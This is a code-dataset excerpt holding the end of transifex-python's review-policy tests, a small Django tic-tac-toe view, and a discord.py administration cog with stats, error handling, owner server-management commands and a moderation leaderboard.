test_low_file_review_policy_not_prompts_for_file_with_high_conf_strings(\n mock_file_prompt\n):\n # This policy prompts for files that include a string with low confidence\n policy = LowConfidenceFileReviewPolicy()\n file_migration = _file()\n file_migration.add_string(_string(Confidence.HIGH))\n file_migration.add_string(_string(Confidence.HIGH))\n file_migration.add_string(_string(Confidence.HIGH))\n policy.review_file(file_migration)\n assert mock_file_prompt.call_count == 0\n\n\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_string')\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_file')\ndef test_string_review_policy_prompts_for_string(mock_file_prompt,\n mock_string_prompt):\n # This policy prompts for all strings\n policy = StringReviewPolicy()\n string_migration1 = _string(Confidence.HIGH)\n policy.review_string(string_migration1, 5, 10)\n string_migration2 = _string(Confidence.LOW)\n policy.review_string(string_migration2, 15, 20)\n assert mock_string_prompt.call_args_list[0][0] == (\n string_migration1, 5, 10)\n assert mock_string_prompt.call_args_list[1][0] == (\n string_migration2, 15, 20)\n\n # This policy does not prompt for file reviews\n policy.review_file(_file())\n 
assert mock_file_prompt.call_count == 0\n\n\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_string')\n@patch('transifex.native.tools.migrations.review.ReviewPolicy'\n '.prompt_for_file')\ndef test_low_string_review_policy_prompts_for_low_conf_string_only(\n mock_file_prompt, mock_string_prompt\n):\n # This policy prompts for strings that have a low confidence\n policy = LowConfidenceStringReviewPolicy()\n string_migration = _string(Confidence.HIGH)\n policy.review_string(string_migration, 5, 10)\n string_migration = _string(Confidence.LOW)\n policy.review_string(string_migration, 10, 10)\n mock_string_prompt.assert_called_once_with(string_migration, 10, 10)\n\n # This policy does not prompt for file reviews\n policy.review_file(_file())\n assert mock_file_prompt.call_count == 0\n\n\ndef test_set_comment_format_exception_for_wrong_format():\n # An exception should be raised if the given format does not include {}\n policy = ReviewPolicy()\n with pytest.raises(ValueError):\n policy.set_comment_format('{')\n\n\ndef test_add_line_prefix():\n text = \"This\\nis\\ngood\"\n assert add_line_prefix(text, '+ ') == \"+ This\\n+ is\\n+ good\"\n assert add_line_prefix(text, '+ ', 99) == \\\n \"99 + This\\n100 + is\\n101 + good\"\n assert add_line_prefix('', '+ ') == ''\n assert add_line_prefix(None, '+ ') is None\n\n\ndef _string(confidence=Confidence.HIGH):\n \"\"\"Return a sample StringMigration object for testing.\"\"\"\n return StringMigration('original', 'new', confidence)\n\n\ndef _file():\n \"\"\"Return a sample FileMigration object for testing.\"\"\"\n return FileMigration('filename', 'content')\n", "repo_name": "transifex/transifex-python", "sub_path": "tests/native/core/test_tools/test_migrations/test_review.py", "file_name": "test_review.py", "file_ext": "py", "file_size_in_byte": 5632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 32, "dataset": "github-code", "pt": "86", "api": [{"api_name": "transifex.native.tools.migrations.review.ReviewPolicy", "line_number": 13, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.REVIEW_ACCEPT", "line_number": 14, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.review.REVIEW_ACCEPT", "line_number": 15, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.review.FileReviewPolicy", "line_number": 25, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 31, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 31, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.LOW", "line_number": 33, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 33, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 18, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 20, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.LowConfidenceFileReviewPolicy", "line_number": 46, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 48, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 48, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 49, "usage_type": "attribute"}, {"api_name": 
"transifex.native.tools.migrations.models.Confidence", "line_number": 49, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.LOW", "line_number": 50, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 50, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 55, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 55, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.LOW", "line_number": 57, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 57, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 38, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 40, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.LowConfidenceFileReviewPolicy", "line_number": 68, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 70, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 70, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 71, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 71, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 72, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 72, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 62, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.StringReviewPolicy", "line_number": 84, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 85, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 85, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.LOW", "line_number": 87, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 87, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 77, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 79, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.LowConfidenceStringReviewPolicy", "line_number": 107, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 108, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 108, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.LOW", "line_number": 110, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 110, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 99, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 101, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.ReviewPolicy", "line_number": 121, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 122, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.add_line_prefix", "line_number": 128, "usage_type": 
"call"}, {"api_name": "transifex.native.tools.migrations.review.add_line_prefix", "line_number": 129, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.add_line_prefix", "line_number": 131, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.review.add_line_prefix", "line_number": 132, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.Confidence.HIGH", "line_number": 135, "usage_type": "attribute"}, {"api_name": "transifex.native.tools.migrations.models.Confidence", "line_number": 135, "usage_type": "name"}, {"api_name": "transifex.native.tools.migrations.models.StringMigration", "line_number": 137, "usage_type": "call"}, {"api_name": "transifex.native.tools.migrations.models.FileMigration", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "40310999934", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Create your views here.\ndef shouldReset(board):\n\t\tfor row in board:\n\t\t\tif row[0] != '_' and row[0] == row[1] and row[1] == row[2]:\n\t\t\t\treturn True\n\n\t\tfor col in range(0, 3):\n\t\t\tif board[0][col] != '_' and board[0][col] == board[1][col] and board[1][col] == board[2][col]:\n\t\t\t\treturn True\n\t\t\n\t\tif board[1][1] != '_':\n\t\t\tif board[0][0] == board[1][1] and board[1][1] == board[2][2]:\n\t\t\t\treturn True\n\n\t\t\tif board[0][2] == board[1][1] and board[1][1] == board[2][0]:\n\t\t\t\treturn True\n\t\treturn False\n\ndef emptyBoard():\n\treturn [['_','_', '_'], ['_', '_', '_'], ['_', '_', '_']]\n\ndef index(request):\n\t# If they don't have a board, give them a board\n\tif \"board\" not in request.session.keys():\n\t\trequest.session[\"board\"] = emptyBoard()\n\tboard = request.session[\"board\"]\n\n\t# If they are here because they played a move\n\tif request.method == \"POST\":\n\t\t# Let them play their move\n\t\tif board[int(request.POST[\"row\"])][int(request.POST[\"col\"])] == \"_\":\n\t\t\tboard[int(request.POST[\"row\"])][int(request.POST[\"col\"])] = \"X\"\n\n\t\t# If they won, or we won, then reset the board\n\t\tif shouldReset(board):\n\t\t\tboard = emptyBoard()\n\n\t\t# Otherwise, we play in any tile that we can, if we can play at all\n\t\telse:\n\t\t\tplayed = False\n\t\t\tfor row in range(0,3):\n\t\t\t\tfor col in range(0,3):\n\t\t\t\t\tif board[row][col] == \"_\" and not played:\n\t\t\t\t\t\tboard[row][col] = \"O\"\n\t\t\t\t\t\tplayed = True\n\t\t\t\t\t\n\t\t# Send the board back to be rendered\n\t\trequest.session[\"board\"] = board\n\t\trequest.session.modified = True\n\n\treturn render(request, \"tictactoe/index.html\", {\"board\":request.session[\"board\"]})\n\n\n\t\n", "repo_name": "elijahtai14/CS33aTeachingMaterials", "sub_path": "section2/sect2_game_working/tictactoe/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.shortcuts.render", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "9365237396", "text": "import asyncio\r\n\r\nimport discord\r\nfrom discord.ext import commands\r\nfrom jishaku.paginators import PaginatorEmbedInterface, PaginatorInterface\r\n\r\nfrom .utils.config import read\r\nfrom .utils.entry_helper import Case, Converters\r\nimport typing\r\n\r\n\r\nclass DynamicGuild(commands.Converter):\r\n\tasync def convert(self, ctx, argument):\r\n\t\ttry:\r\n\t\t\targument = int(argument)\r\n\t\texcept:\r\n\t\t\tpass\r\n\t\tbot = 
ctx.bot\r\n\t\tif isinstance(argument, int):\r\n\t\t\t# check if it's an ID first, else check enumerator\r\n\t\t\tguild = bot.get_guild(argument)\r\n\t\t\tif guild is not None: # YAY\r\n\t\t\t\treturn guild\r\n\t\t\telse: # AWW\r\n\t\t\t\tfor number, guild in enumerate(bot.guilds, start=1):\r\n\t\t\t\t\tif number == argument:\r\n\t\t\t\t\t\treturn guild\r\n\t\t\t\telse:\r\n\t\t\t\t\tif guild is None:\r\n\t\t\t\t\t\traise commands.BadArgument(f\"Could not convert '{argument}' to 'Guild' with reason 'type None'\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\traise commands.BadArgument(f\"Could not convert '{argument}' to 'Guild' as loop left.\")\r\n\t\telif isinstance(argument, str): # assume it's a name\r\n\t\t\tfor guild in bot.guilds:\r\n\t\t\t\tif guild.name.lower() == argument.lower():\r\n\t\t\t\t\treturn guild\r\n\t\t\telse:\r\n\t\t\t\traise commands.BadArgument(f\"Could not convert '{argument}' to 'Guild' with reason 'type None' at 1\")\r\n\t\telse:\r\n\t\t\traise commands.BadArgument(f\"Could not convert argument of type '{type(argument)}' to 'Guild'\")\r\n\r\n\r\nclass Meta(commands.Cog):\r\n\tdef __init__(self, bot):\r\n\t\tself.bot = bot\r\n\r\n\t@commands.command(name=\"stats\", hidden=True)\r\n\t@commands.bot_has_permissions(embed_links=True)\r\n\tasync def statistics(self, ctx: commands.Context):\r\n\t\t\"\"\"Shows the bot's statistics. Pretty simple.\"\"\"\r\n\t\tfrom datetime import datetime, timedelta\r\n\t\tdef p(n):\r\n\t\t\treturn f'+{n}' if n > 0 else str(n)\r\n\r\n\t\tdef s(n, n2):\r\n\t\t\tif n > n2:\r\n\t\t\t\treturn \"\\U00002b06\"\r\n\t\t\telif n < n2:\r\n\t\t\t\treturn \"\\U00002b07\"\r\n\t\t\telse:\r\n\t\t\t\treturn \"\"\r\n\r\n\t\tno = datetime.utcnow()\r\n\t\tyesterday = no - timedelta(-1)\r\n\t\ttya = no - timedelta(-2)\r\n\t\tguilds_two_days = len([\r\n\t\t\tn for n in self.bot.guilds if n.me.joined_at.day == tya.day and n.me.joined_at.month == tya.month \\\r\n\t\t\t and n.me.joined_at.year == tya.year\r\n\t\t])\r\n\t\tguilds_yesterday = len([\r\n\t\t\tn for n in self.bot.guilds if\r\n\t\t\tn.me.joined_at.day == yesterday.day and n.me.joined_at.month == yesterday.month \\\r\n\t\t\tand n.me.joined_at.year == yesterday.year\r\n\t\t])\r\n\t\tguilds_today = len([\r\n\t\t\tn for n in self.bot.guilds if\r\n\t\t\tn.me.joined_at.day == no.day and n.me.joined_at.month == no.month and n.me.joined_at.year == no.year\r\n\t\t])\r\n\t\tguilds_tomorrow = guilds_today + (guilds_two_days + guilds_yesterday)\r\n\t\tguilds_ind = guilds_tomorrow + (guilds_yesterday + guilds_today)\r\n\r\n\t\tgtd = guilds_two_days\r\n\t\tawait ctx.send(\r\n\t\t\tf\"**Guilds:**\\nTotal: {len(self.bot.guilds)}\\n\\nTwo Days Ago: {p(gtd)}\\n\"\r\n\t\t\tf\"Yesterday: {p(guilds_yesterday)} {s(guilds_yesterday, gtd)}\\n\"\r\n\t\t\tf\"Today: {p(guilds_today)} {s(guilds_today, guilds_yesterday)}\\n\"\r\n\t\t\tf\"*Predicted Futures:*\\n\"\r\n\t\t\tf\"Tomorrow: {p(guilds_tomorrow)}\\n\"\r\n\t\t\tf\"In Two Days: {p(guilds_ind)}\"\r\n\t\t)\r\n\r\n\t@commands.Cog.listener()\r\n\tasync def on_command_error(self, ctx, error):\r\n\t\tignored = commands.CommandNotFound\r\n\t\tif isinstance(error, ignored):\r\n\t\t\treturn # we don't really care\r\n\r\n\t\tif isinstance(error, commands.NotOwner):\r\n\t\t\treturn await ctx.send(\"You're not my owner!\")\r\n\t\telif isinstance(error, commands.BotMissingPermissions):\r\n\t\t\tmperms = [str(x).replace('_', ' ') for x in error.missing_perms]\r\n\t\t\tasd = \"'\"\r\n\t\t\te = discord.Embed(\r\n\t\t\t\ttitle=\"I'm missing permissions!\",\r\n\t\t\t\tdescription=f\"Give me '{f'{asd},
 {asd}'.join(mperms)}' first!\",\r\n\t\t\t\tcolor=discord.Color.dark_orange()\r\n\t\t\t)\r\n\t\t\tif ctx.channel.permissions_for(ctx.me).send_messages and ctx.channel.permissions_for(ctx.me).embed_links:\r\n\t\t\t\treturn await ctx.send(embed=e)\r\n\t\t\telse:\r\n\t\t\t\tif ctx.channel.permissions_for(ctx.me).send_messages:\r\n\t\t\t\t\treturn await ctx.send(\"I'm missing core permissions, like embed links. Provide this and try again.\")\r\n\t\telif isinstance(error, commands.MissingPermissions):\r\n\t\t\tmperms = [str(x).replace('_', ' ') for x in error.missing_perms]\r\n\t\t\tasd = \"'\"\r\n\t\t\te = discord.Embed(\r\n\t\t\t\ttitle=\"You are missing permissions!\",\r\n\t\t\t\tdescription=f\"You need '{f'{asd}, {asd}'.join(mperms)}' first!\",\r\n\t\t\t\tcolor=discord.Color.dark_orange()\r\n\t\t\t)\r\n\t\t\tif ctx.channel.permissions_for(ctx.me).send_messages and ctx.channel.permissions_for(ctx.me).embed_links:\r\n\t\t\t\treturn await ctx.send(embed=e)\r\n\t\t\telse:\r\n\t\t\t\tif ctx.channel.permissions_for(ctx.me).send_messages:\r\n\t\t\t\t\treturn await ctx.send(\"I'm missing core permissions, like embed links. Provide this and try again.\")\r\n\r\n\t\telif \"has been disabled by a server admin.\" in str(error):\r\n\t\t\treturn await ctx.send(str(error))\r\n\t\telif isinstance(error, commands.CommandOnCooldown):\r\n\t\t\ttry_again = Converters.fix_time(error.retry_after)\r\n\t\t\treturn await ctx.send(f\"{ctx.command.qualified_name} is on cooldown! Try again in {try_again}\")\r\n\t\telif isinstance(error, discord.Forbidden):\r\n\t\t\treturn await ctx.send(f\"I can not do that action because '{error.text}'.\")\r\n\t\telif isinstance(error, asyncio.TimeoutError):\r\n\t\t\treturn await ctx.send(f\"Timed out when waiting for a response.\")\r\n\t\telif isinstance(error, discord.NotFound):\r\n\t\t\treturn await ctx.send(f\"A requested item could not be found: '{error.text}'\")\r\n\t\telse:\r\n\t\t\te = discord.Embed(\r\n\t\t\t\ttitle=\"oops!\",\r\n\t\t\t\tdescription=f\"an error occurred: `{str(error)}`. Please inform my developer in the [support server]\"\r\n\t\t\t\t\t\t\tf\"(https://beta.dragdev.xyz/r/server.html).\\n\\nIf this is a common error, please tell my \"\r\n\t\t\t\t\t\t\tf\"dev that this error is common.\",\r\n\t\t\t\tcolor=discord.Color.dark_red(),\r\n\t\t\t\turl='https://dragdev.xyz/redirects/server.html'\r\n\t\t\t)\r\n\t\t\tawait ctx.send(embed=e)\r\n\t\t\traise error\r\n\r\n\t@commands.group(invoke_without_command=True)\r\n\t@commands.is_owner()\r\n\tasync def servers(self, ctx):\r\n\t\t\"\"\"Lists servers.\"\"\"\r\n\t\tpaginator = PaginatorEmbedInterface(self.bot, commands.Paginator(prefix=\"```md\", max_size=500))\r\n\t\tfor number, guild in enumerate(ctx.bot.guilds, start=1):\r\n\t\t\tdot = '\\u200B.'\r\n\t\t\tbacktick = '\\u200B`'\r\n\t\t\tawait paginator.add_line(\r\n\t\t\t\tdiscord.utils.escape_markdown(f'{number}. {guild.name.replace(\".\", dot).replace(\"`\", backtick)}\\n'))\r\n\t\tawait paginator.send_to(ctx.channel)\r\n\r\n\t@servers.command(aliases=['join'])\r\n\t@commands.is_owner()\r\n\tasync def invite(self, ctx, *, guild: DynamicGuild()):\r\n\t\t\"\"\"get an invite to a guild\r\n\r\n\t\tyou can pass a name, id or enumerator number. 
ID is better.\"\"\"\r\n\t\tif guild.me.guild_permissions.manage_guild:\r\n\t\t\tm = await ctx.send(\"Attempting to find an invite.\")\r\n\t\t\tinvites = await guild.invites()\r\n\t\t\tfor invite in invites:\r\n\t\t\t\tif invite.max_age == 0:\r\n\t\t\t\t\treturn await m.edit(content=f\"Infinite Invite: {invite}\")\r\n\t\t\telse:\r\n\t\t\t\tawait m.edit(content=\"No Infinite Invites found - creating.\")\r\n\t\t\t\tfor channel in guild.text_channels:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tinvite = await channel.create_invite(max_age=60, max_uses=1, unique=True,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t reason=f\"Invite requested\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tf\" by {ctx.author} via official management command. do not be alarmed, this is usually just\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tf\" to check something.\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn await m.edit(content=f\"Unable to create an invite - missing permissions.\")\r\n\t\t\t\tawait m.edit(content=f\"Temp invite: {invite.url} -> max age: 60s, max uses: 1\")\r\n\t\telse:\r\n\t\t\tm = await ctx.send(\"Attempting to create an invite.\")\r\n\t\t\tfor channel in guild.text_channels:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tinvite = await channel.create_invite(max_age=60, max_uses=1, unique=True,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t reason=f\"Invite requested\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tf\" by {ctx.author} via official management command. do not be alarmed, this is usually just\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tf\" to check something.\")\r\n\t\t\t\t\tbreak\r\n\t\t\t\texcept:\r\n\t\t\t\t\tcontinue\r\n\t\t\telse:\r\n\t\t\t\treturn await m.edit(content=f\"Unable to create an invite - missing permissions.\")\r\n\t\t\tawait m.edit(content=f\"Temp invite: {invite.url} -> max age: 60s, max uses: 1\")\r\n\r\n\t@servers.command(name='leave')\r\n\t@commands.is_owner()\r\n\tasync def _leave(self, ctx, guild: DynamicGuild(), *, reason: str = None):\r\n\t\t\"\"\"Leave a guild. if ::reason:: is provided, then an embed is sent to the guild owner/system channel\r\n\t\tstating who made the bot leave (you), the reason and when.\r\n\r\n\t\tsupply no reason to do a 'silent' leave\"\"\"\r\n\t\tif reason:\r\n\t\t\te = discord.Embed(color=discord.Color.orange(), description=reason, timestamp=ctx.message.created_at)\r\n\t\t\te.set_author(name=str(ctx.author), icon_url=ctx.author.avatar_url_as(static_format='png'))\r\n\t\t\tif guild.system_channel is not None:\r\n\t\t\t\tif guild.system_channel.permissions_for(guild.me).send_messages:\r\n\t\t\t\t\tif guild.system_channel.permissions_for(guild.me).embed_links:\r\n\t\t\t\t\t\tawait guild.system_channel.send(embed=e)\r\n\t\t\telse:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tawait guild.owner.send(embed=e)\r\n\t\t\t\texcept discord.Forbidden:\r\n\t\t\t\t\tpass\r\n\r\n\t\tawait guild.leave()\r\n\t\tawait ctx.send(f\"Left {guild.name} ({guild.id}) {f'for: {reason}' if reason else ''}\")\r\n\r\n\t@servers.command()\r\n\t@commands.is_owner()\r\n\tasync def info(self, ctx, *, guild: DynamicGuild()):\r\n\t\t\"\"\"Force get information on a guild. 
this includes debug information.\"\"\"\r\n\t\towner, mention = guild.owner, guild.owner.mention\r\n\t\ttext_channels = len(guild.text_channels)\r\n\t\tvoice_channels = len(guild.voice_channels)\r\n\t\troles, totalroles = [(role.name, role.permissions) for role in reversed(guild.roles)], len(guild.roles)\r\n\t\tbots, humans = len([u for u in guild.members if u.bot]), len([u for u in guild.members if not u.bot])\r\n\r\n\t\tdef get_simplified_ratio():\r\n\t\t\tx = bots\r\n\t\t\ty = humans\r\n\r\n\t\t\tdef get_hcf():\r\n\t\t\t\tif x > y:\r\n\t\t\t\t\tsmaller = y\r\n\t\t\t\telse:\r\n\t\t\t\t\tsmaller = x\r\n\t\t\t\tfor i in range(smaller, 0, -1):\r\n\t\t\t\t\tif (x % i == 0) and (y % i == 0):\r\n\t\t\t\t\t\thcf = i\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\traise ArithmeticError(f\"Unable to find HCF for {x} and {y} (smallest {smaller})\")\r\n\t\t\t\treturn hcf\r\n\r\n\t\t\thcf = get_hcf()\r\n\t\t\treturn f\"{x / hcf}:{y / hcf}\"\r\n\r\n\t\tbot_to_human_ratio = '{}:{} ({})'.format(bots, humans, get_simplified_ratio())\r\n\t\tdefault_perms = guild.default_role.permissions.value\r\n\t\tinvites = len(await guild.invites()) if guild.me.guild_permissions.manage_guild else 'Not Available'\r\n\t\tfmt = f\"Owner: {owner} ({owner.mention})\\nText channels: {text_channels}\\nVoice Channels: {voice_channels}\\n\" \\\r\n\t\t\t f\"Roles: {totalroles}\\nBTHR: {bot_to_human_ratio}\\n`@everyone` role permissions: {default_perms}\\nInvites: \" \\\r\n\t\t\t f\"{invites}\"\r\n\t\tawait ctx.send(fmt)\r\n\r\n\t\tpaginator = PaginatorEmbedInterface(self.bot, commands.Paginator(max_size=500))\r\n\t\tfor name, value in roles:\r\n\t\t\tawait paginator.add_line(f\"@{name}: {value}\")\r\n\t\tawait paginator.send_to(ctx.channel)\r\n\t\treturn await ctx.message.add_reaction('\\U00002705')\r\n\r\n\t@servers.command(name=\"ban\", aliases=['unban'])\r\n\t@commands.is_owner()\r\n\tasync def server_ban(self, ctx, guild: typing.Union[DynamicGuild, int], *, reason: str = None):\r\n\t\timport json\r\n\t\tguild: int = guild.id if isinstance(guild, discord.Guild) else guild\r\n\t\toldguild = self.bot.get_guild(guild)\r\n\t\twith open(\"./banned_servers.json\", \"r+\") as bs:\r\n\t\t\ttry:\r\n\t\t\t\tdata = json.load(bs)\r\n\t\t\texcept json.JSONDecodeError:\r\n\t\t\t\tdata = dict()\r\n\t\t\tif data.get(str(guild)):\r\n\t\t\t\tdel data[guild]\r\n\t\t\t\tawait ctx.send(f\"Unbanned guild with ID `{guild}`.\")\r\n\t\t\telse:\r\n\t\t\t\tdata[guild] = {\r\n\t\t\t\t\t\"reason\": reason,\r\n\t\t\t\t\t\"banned at\": str(ctx.message.created_at), # trying not to import too many things here so i can\r\n\t\t\t\t\t# just paste it across bots\r\n\t\t\t\t\t\"banned by\": ctx.author.id\r\n\t\t\t\t}\r\n\t\t\t\treason = reason or \"No Reason Provided\"\r\n\t\t\t\ttry:\r\n\t\t\t\t\tawait oldguild.owner.send(f\"Your server \\\"**{discord.utils.escape_markdown(oldguild.name)}**\\\"\"\r\n\t\t\t\t\t\t\t\t\t\t\t f\" has been banned from using me with the following reason: {reason}.\"\r\n\t\t\t\t\t\t\t\t\t\t\t f\" To appeal this, please join my support server at\"\r\n\t\t\t\t\t\t\t\t\t\t\t f\" <https://beta.dragdev.xyz/r/server.html> and ask a developer\"\r\n\t\t\t\t\t\t\t\t\t\t\t f\" for an appeal.\")\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass\r\n\t\t\t\tawait ctx.send(f\"Banned guild with ID `{guild}` with reason {discord.utils.escape_mentions(str(reason))}.\")\r\n\t\twith open(\"./banned_servers.json\", \"w+\") as ab:\r\n\t\t\tjson.dump(data, ab, indent=2)\r\n\t\treturn\r\n\r\n\t@commands.group(aliases=['modboards', 'modlb', 'lbmod'], 
)\r\n\t@commands.has_permissions(manage_messages=True)\r\n\t@commands.bot_has_permissions(embed_links=True, manage_messages=True, add_reactions=True)\r\n\tasync def modboard(self, ctx, *, sort_by_action: str = 'warns'):\r\n\t\t\"\"\"Shows the moderation leaderboard\"\"\"\r\n\t\ttypes = ['warns', 'mutes', 'unmutes', 'kicks', 'bans', 'unbans', 'all']\r\n\t\tsort_by_action = sort_by_action.lower()\r\n\t\tif sort_by_action not in types:\r\n\t\t\tesc = '\\n• '\r\n\t\t\treturn await ctx.send(f\"No valid type to sort by. Please use one of the following:\\n• {esc.join(types)}\")\r\n\t\telse:\r\n\t\t\tasync with ctx.channel.typing(): # aesthetics don't complain\r\n\t\t\t\tdata = read('./data/core.json')\r\n\t\t\t\tguild = data.get(str(ctx.guild.id))\r\n\t\t\t\tpaginator = PaginatorEmbedInterface(self.bot, commands.Paginator(max_size=1000, prefix='', suffix=''))\r\n\t\t\t\t# paginator = commands.Paginator(max_size=2000)\r\n\t\t\t\tkey = guild.get(sort_by_action)\r\n\t\t\t\tauthors = {}\r\n\t\t\t\tif key:\r\n\t\t\t\t\t# print(key)\r\n\t\t\t\t\tfor _case in key.keys():\r\n\t\t\t\t\t\t# print(_case)\r\n\t\t\t\t\t\t_case = key[_case]\r\n\t\t\t\t\t\t_case['type'] = sort_by_action\r\n\t\t\t\t\t\t_case['ctx'] = ctx\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tcase = await Case.from_dict(_case)\r\n\t\t\t\t\t\texcept (KeyError, Exception):\r\n\t\t\t\t\t\t\tawait ctx.send(f\"Error while creating case - skipping...\", delete_after=10)\r\n\t\t\t\t\t\t\tawait asyncio.sleep(2)\r\n\t\t\t\t\t\tif authors.get(case.author):\r\n\t\t\t\t\t\t\tauthors[case.author] += 1\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tauthors[case.author] = 1\r\n\t\t\t\t\tkeys = sorted(authors.keys(), key=lambda a: authors[a])\r\n\t\t\t\t\t# print(\"sorted\", keys)\r\n\t\t\t\t\tfor rank, user in enumerate(keys, start=1):\r\n\t\t\t\t\t\tif not isinstance(user, (discord.Member, discord.User)):\r\n\t\t\t\t\t\t\tname = f'Unknown (ID: {user})'\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tname = user.display_name\r\n\t\t\t\t\t\tawait paginator.add_line(f\"**{rank}. 
{name}** with __{authors[user]}__ {sort_by_action}\")\r\n\t\t\t\t\t\t# print(\"adding line\")\r\n\t\t\tif len(paginator.pages) == 0:\r\n\t\t\t\treturn await ctx.send(\"No events under that type found.\")\r\n\t\t\telse:\r\n\t\t\t\tawait paginator.send_to(ctx.channel)\r\n\r\n\r\ndef setup(bot):\r\n\tbot.add_cog(Meta(bot))\r\n", "repo_name": "dragdev-studios/Guardian", "sub_path": "cogs/meta.py", "file_name": "meta.py", "file_ext": "py", "file_size_in_byte": 14165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "88", "api": [{"api_name": "discord.ext.commands.Converter", "line_number": 12, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 12, "usage_type": "name"}, {"api_name": "discord.ext.commands.BadArgument", "line_number": 30, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 30, "usage_type": "name"}, {"api_name": "discord.ext.commands.BadArgument", "line_number": 32, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 32, "usage_type": "name"}, {"api_name": "discord.ext.commands.BadArgument", "line_number": 38, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 38, "usage_type": "name"}, {"api_name": "discord.ext.commands.BadArgument", "line_number": 40, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 40, "usage_type": "name"}, {"api_name": "discord.ext.commands.Cog", 